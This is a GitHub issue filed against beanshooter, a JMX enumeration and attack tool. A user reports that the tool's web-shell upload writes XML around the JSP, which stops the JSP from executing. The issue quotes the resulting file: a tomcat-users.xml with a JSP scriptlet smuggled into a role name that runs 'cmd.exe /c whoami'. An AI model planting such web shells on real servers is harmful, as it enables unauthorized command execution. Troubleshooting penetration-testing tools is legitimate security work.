qtc-de / beanshooter

JMX enumeration and attacking tool.
GNU General Public License v3.0
393 stars 46 forks source link

issue in creating the web shell #44

Open 0xE1C9 opened 2 weeks ago

0xE1C9 commented 2 weeks ago

Hi , Thanks for the great tool

i am on case that the webserver dosn't have any user , so the tool is creating user to write a web shell.

the tool is writing the webshell + xml content which preventing the jsp file from execution.

here is an example from the uploaded web shell

<?xml version='1.0' encoding='utf-8'?><tomcat-users xmlns="http://tomcat.apache.org/xml"              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"              version="1.0">  <role rolename="__beanshooterRole__" description=""/><%ProcessBuilder pb = new ProcessBuilder("cmd.exe", "/c", "whoami");pb.redirectOutput(new java.io.File("whoami.txt"));pb.start();%><a h=""/></tomcat-users>
0xE1C9 commented 2 weeks ago

@qtc-de